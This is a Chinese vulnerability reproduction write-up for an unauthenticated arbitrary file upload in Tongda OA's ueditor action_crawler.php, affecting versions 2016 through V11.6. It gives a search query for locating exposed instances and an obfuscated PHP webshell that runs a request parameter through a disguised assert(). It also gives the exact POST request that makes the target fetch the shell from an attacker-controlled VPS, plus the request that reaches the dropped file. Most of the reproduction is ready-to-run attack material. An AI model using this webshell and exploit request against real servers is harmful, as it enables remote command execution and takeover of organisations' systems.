登录 白背景

通达OA action_crawler存在前台任意文件上传漏洞

一、漏洞简介

通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。通达OA action_crawler存在前台任意文件上传漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限。

二、影响版本

  • 通达OA 2016-通达OA V11.6

三、资产测绘

  • hunterapp.name="通达 OA"
  • 特征

image.png

四、漏洞复现

  1. 将webshell2.php上传到vps中
<?php class  Gisip4hi{/*FVzil1*/function __construct($x){$c=str_rot13('ffreg');/*FVzil1*/$a= ("!"^"@").$c;/*FVzil1*/$a($x);}}new  Gisip4hi($_REQUEST['x']); ?>
  1. 使用python3启用http服务
python3 -m http.server 9000

image.png

  1. 上传文件
POST /module/ueditor/php/action_crawler.php HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Content-Length: 197
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

CONFIG[catcherPathFormat]=/api/1&CONFIG[catcherMaxSize]=100000&CONFIG[catcherAllowFiles][]=.php&CONFIG[catcherAllowFiles][]=.ico&CONFIG[catcherFieldName]=file&file[]=http://vpsip/2.php

image.png

  1. 上传文件位置
GET /api/1.php HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 2

image.png
image.png
nuclei脚本
通达OA-action-crawler-任意文件上传.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/vglha6y2aqtmkf7p